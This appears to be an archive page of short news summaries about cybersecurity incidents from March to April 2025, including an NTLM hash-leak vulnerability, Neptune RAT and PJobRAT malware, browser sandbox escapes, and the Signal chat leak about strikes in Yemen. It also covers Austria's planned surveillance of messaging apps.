espionage Archives

Winsage

April 17, 2025

Hackers Exploiting NTLM Spoofing Vulnerability in Wild to Compromise Systems

Cybercriminals are exploiting a vulnerability in Windows systems known as CVE-2025-24054, which involves NTLM hash disclosure through spoofing techniques. This flaw allows attackers to leak NTLM hashes, leading to privilege escalation and lateral movement within networks. It is triggered when a user extracts a ZIP archive containing a malicious .library-ms file, causing Windows Explorer to initiate SMB authentication requests that expose NTLMv2-SSP hashes. Exploitation of this vulnerability began shortly after a security patch was released on March 11, 2025, with campaigns targeting government and private institutions in Poland and Romania. These campaigns utilized spear-phishing emails containing malicious ZIP archives, which, when interacted with, leaked NTLM hashes. The malicious files included various types designed to initiate SMB connections to attacker-controlled servers, allowing for pass-the-hash attacks and privilege escalation. The stolen hashes were sent to servers in several countries, indicating potential links to state-sponsored groups. One campaign involved Dropbox links that exploited the vulnerability upon user interaction. Microsoft has recommended immediate patching, enhancing network defenses, user education, network segmentation, and regular security audits to mitigate risks associated with this vulnerability.

AppWizard

April 9, 2025

Austrian government plans surveillance of WhatsApp, Telegram messaging apps

The Austrian government has introduced a draft law to increase oversight of messaging apps like WhatsApp and Telegram, aiming to aid law enforcement in monitoring potential terrorist and extremist activities. Interior Minister Gerhard Karner stated that police currently lack visibility into the actions of such individuals on these platforms, highlighting the need for specific measures that would only apply to a limited number of cases annually. Access to messaging services would be granted only in situations that suggest terrorist-related or constitution-threatening activities. The initiative received support from State Secretary Jorg Leichtfried of the Social Democratic Party, who assured that it would not lead to mass surveillance. However, there are concerns from the liberal NEOS party regarding the proposal, indicating the need for further discussions. An eight-week review period has been established for the draft law, during which the involved parties will engage with each other.

Winsage

April 8, 2025

Neptune RAT malware is hijacking Windows PCs, holding them for ransom and stealing passwords

Cybercriminals have released a new malware strain called Neptune RAT, which targets Windows PCs and is capable of stealing cryptocurrencies and passwords, as well as holding data for ransom. It features a crypto clipper that can alter cryptocurrency wallet addresses, a password-stealing function affecting over 270 applications, and ransomware capabilities that lock files until a ransom is paid. The malware can disable antivirus software, monitor victims' screens in real-time, and has the ability to wipe a PC. It is distributed through platforms like GitHub, Telegram, and YouTube, making it difficult for cybersecurity researchers to analyze. Users are advised to be cautious with downloads, consider identity theft protection services, and practice safe browsing habits to mitigate risks.

AppWizard

March 28, 2025

Hackers target Taiwan with malware delivered via fake messaging apps

Recent research from cybersecurity firm Sophos has identified the use of PJobRAT malware targeting users in Taiwan through instant messaging applications SangaalLite and CChat, which mimic legitimate platforms. These malicious apps were available for download on various WordPress sites, now taken offline. PJobRAT, an Android remote access trojan first identified in 2019, has been used to steal SMS messages, contacts, device information, documents, and media files. The recent cyber-espionage initiative lasted nearly two years, affecting a limited number of users, indicating a targeted approach by the attackers. The latest version of PJobRAT lacks the ability to steal WhatsApp messages but allows attackers greater control over infected devices. The distribution method for these apps remains unclear, but previous campaigns involved third-party app stores and phishing pages. Upon installation, the apps request extensive permissions and provide basic chat functionalities. Sophos researchers note that threat actors often refine their strategies after campaigns, suggesting ongoing risks.

Winsage

March 28, 2025

Windows Users at Risk: New Zero-Day Exploit Steals Passwords Without Interaction

A newly uncovered zero-day vulnerability in Windows allows hackers to steal NTLM credentials simply by previewing a malicious file, affecting multiple Windows versions, including Windows 7 and Windows 11 v24H2. Microsoft has not yet issued a patch for this vulnerability, leaving millions of users exposed. The flaw was reported by security researcher Mitja Kolsek from ACROS Security, who noted that stolen credentials could lead to unauthorized access to networks. ACROS Security has created a temporary micro-patch available through its 0patch platform, which users are encouraged to implement. Additionally, a separate zero-day vulnerability identified in Google Chrome and other Chromium-based browsers allows attackers to bypass sandbox protection with a click on a malicious link, primarily targeting media organizations and government agencies in Russia. Users are advised to install the 0patch fix, avoid interacting with unfamiliar files, and update their browsers to protect against these threats.

AppWizard

March 28, 2025

Was the Signal Chat Illegal?

Some Democrats are claiming that the unintentional inclusion of a journalist in a Trump administration group chat about a military operation in Yemen may be criminal, with legal experts suggesting it could breach the Espionage Act. The chat took place on Signal and involved high-ranking national security officials, including Defense Secretary Pete Hegseth, who reportedly shared details about imminent military strikes. The Department of Defense prohibits sharing non-public information through messaging apps, and the Pentagon later warned of vulnerabilities in Signal that could be exploited by Russian hackers. House Speaker Mike Johnson called the use of Signal a "mistake," while several Democrats, including Sen. Elizabeth Warren and Rep. Jim Himes, expressed outrage and called for accountability. Legal experts stated that the chat likely violated the Espionage Act due to potential gross negligence in handling sensitive information. Despite the serious implications, there is skepticism about any prosecution occurring against those involved. The use of Signal raises concerns regarding compliance with federal open-records laws, as messages can be automatically deleted.

Winsage

March 28, 2025

Mozilla warns Windows users of critical Firefox sandbox escape flaw

Mozilla released Firefox version 136.0.4 to address a critical security vulnerability, CVE-2025-2857, which could allow attackers to escape the browser's sandbox on Windows systems. This flaw, identified by developer Andrew McCreight, affects both standard and extended support releases of Firefox. Mozilla patched this issue in Firefox 136.0.4 and Firefox ESR versions 115.21.1 and 128.8.1. The vulnerability is similar to a recent zero-day exploit in Google Chrome, CVE-2025-2783, which was used in cyber-espionage campaigns against Russian entities. Additionally, Mozilla previously addressed another zero-day vulnerability, CVE-2024-9680, exploited by the RomCom cybercrime group, allowing code execution within Firefox's sandbox. Earlier in the year, Mozilla responded to two zero-day vulnerabilities exploited during the Pwn2Own Vancouver 2024 hacking competition.

AppWizard

March 27, 2025

Pentagon issued Signal warning before Trump war group chat leak: Report

Pentagon officials issued a warning about the Signal messaging application after The Atlantic Editor-in-Chief Jeffrey Goldberg was inadvertently included in a group chat with high-ranking Trump administration officials discussing sensitive military strategies, including potential airstrikes in Yemen. An email disclosed a "vulnerability" in Signal, stating that the app is a target for Russian hacking groups that exploit its "linked devices" feature to monitor conversations. The email advised against using Signal for storing nonpublic unclassified information, although it can be used for "unclassified accountability/recall exercises." President Trump and Senators Mark Warner and Angus King commented on the situation, with concerns raised about the potential risks to national security. The administration is reviewing the incident, but no officials have indicated plans to resign.

AppWizard

March 27, 2025

The Trump Administration Accidentally Texted Me Its War Plans

On March 15, news emerged about U.S. military strikes against Houthi targets in Yemen, which had been hinted at through discussions in a Signal group involving senior officials, including the Secretary of Defense and Secretary of State. The group, titled “Houthi PC small group,” discussed operational details of the strikes, raising concerns about the appropriateness of using an encrypted messaging app for sensitive military discussions. On March 14, participants debated the risks and benefits of the action, including its impact on global trade and oil prices. Just before the strikes, a message outlined the operational plan, leading to celebratory reactions after the attacks began. A National Security Council spokesperson confirmed the authenticity of the group and acknowledged a journalist's unintended inclusion. Legal experts noted that discussing classified information on Signal could violate the Espionage Act and federal records laws, raising issues about the credibility of U.S. national security communications.

AppWizard

March 27, 2025

What Is Signal, the App Used by Trump Staff, and Is It Safe?

The Trump administration is under scrutiny for officials using the messaging app Signal for discussions about sensitive military operations, revealed in an article by Jeffrey Goldberg on March 24. Secretary of Defense Pete Hegseth and others discussed military actions in Yemen via Signal, despite prior warnings from the U.S. government against using such applications for official communications. Democratic lawmakers, including Senator Chuck Schumer, are calling for an investigation into potential national security breaches. Signal, launched in 2014, emphasizes privacy through end-to-end encryption and has gained popularity among activists. However, its use in government contexts is contentious, with previous reprimands for non-compliance with federal record preservation requirements. Concerns have been raised about sharing sensitive information on Signal, although intelligence officials stated that no classified information was exchanged in the Trump officials' conversations. The Pentagon has warned military personnel about using Signal due to risks from Russian hackers, and experts suggest that government-specific communication tools would provide a higher level of security.